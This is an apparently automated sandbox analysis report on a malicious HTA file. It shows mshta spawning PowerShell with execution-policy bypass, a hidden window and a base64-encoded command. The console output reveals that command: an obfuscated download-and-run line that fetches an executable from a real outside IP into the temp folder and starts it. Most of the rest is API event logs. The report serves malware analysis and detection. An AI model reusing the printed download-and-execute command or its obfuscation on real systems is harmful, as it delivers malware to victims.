Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 8, 2023, 1:59 p.m.	July 8, 2023, 2:14 p.m.

Size	4.0KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`44b47a2cd519068596c0e8cfcb401904`
SHA256	`adedacd8971d30dea2b7371c20a77ea858301f1feed5d26812636e31b21ed3ee`
CRC32	`784884CE`
ssdeep	`48:3yfwL7z3Q26QvvjKycHyItyvovHyItyvodoZukqPyuLSbXP9XiPG:iw3g1NAiSb1y+`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\IE_NET.hta
1648
- PoWershelL.EXE "C:\Windows\System32\WINdOWSpoWERsHEll\v1.0\PoWershelL.EXE" "pOwERshELL -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g "
  2088
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g
    2220

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0

Command line console output was observed (46 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: At line:1 char:30 console_handle: 0x00000053	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + [Net.SERvicePoINTmaNaGEr]:: <<<< SeCuRitYpRoToCol = [NEt.sEcurI console_handle: 0x0000005f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: TYprOtOColTYPe]::Tls12 ; wGET (” console_handle: 0x0000006b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: http://23.94.236.203/730/IBM_c” console_handle: 0x00000077	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + ”e” console_handle: 0x00000083	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”nts.ex” console_handle: 0x0000009b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”e” ) -outfILe console_handle: 0x000000b3	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”$EnV:teMP\IBM_Centoss.exe” ; console_handle: 0x000000bf	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: STArt ”$ENV:tEmp\IBM_Centoss.exe” console_handle: 0x000000cb	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000000d7	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x000000e3	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: The term 'wGET' is not recognized as the name of a cmdlet, function, script fil console_handle: 0x00000103	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: e, or operable program. Check the spelling of the name, or if a path was includ console_handle: 0x0000010f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ed, verify that the path is correct and try again. console_handle: 0x0000011b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: At line:1 char:115 console_handle: 0x00000127	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + [Net.SERvicePoINTmaNaGEr]::SeCuRitYpRoToCol = [NEt.sEcurITYprOt console_handle: 0x00000133	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: OColTYPe]::Tls12 ; wGET <<<< (” console_handle: 0x0000013f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: http://23.94.236.203/730/IBM_c” console_handle: 0x0000014b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + ”e” console_handle: 0x00000157	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”nts.ex” console_handle: 0x0000016f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”e” ) -outfILe console_handle: 0x00000187	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”$EnV:teMP\IBM_Centoss.exe” ; console_handle: 0x00000193	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: STArt ”$ENV:tEmp\IBM_Centoss.exe” console_handle: 0x0000019f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + CategoryInfo : ObjectNotFound: (wGET:String) [], CommandNotFoun console_handle: 0x000001ab	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: dException console_handle: 0x000001b7	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000001c3	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x000001e3	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: nnot find the file specified. console_handle: 0x000001ef	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: At line:1 char:394 console_handle: 0x000001fb	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + [Net.SERvicePoINTmaNaGEr]::SeCuRitYpRoToCol = [NEt.sEcurITYprOt console_handle: 0x00000207	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: OColTYPe]::Tls12 ; wGET (”http:/ console_handle: 0x00000213	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: /23.94.236.203/730/IBM_c” console_handle: 0x0000021f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + ”e” console_handle: 0x0000022b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”nts.ex” console_handle: 0x00000243	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + ”e” console_handle: 0x0000024f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ) -outfILe console_handle: 0x0000025b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ”$EnV:teMP\IBM_Centoss.exe” ; console_handle: 0x00000267	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: STArt <<<< ”$ENV:tEmp\IBM_Centoss.exe” console_handle: 0x00000273	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x0000027f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: erationException console_handle: 0x0000028b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x00000297	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x000002a3	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 93 events)

Time & API	Arguments	Status	Return
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf1b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003be9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bed70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bed70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004184e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004184e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004184e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004184e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004184e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004184e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 8, 2023, 1:59 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 277 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02520000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02571000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
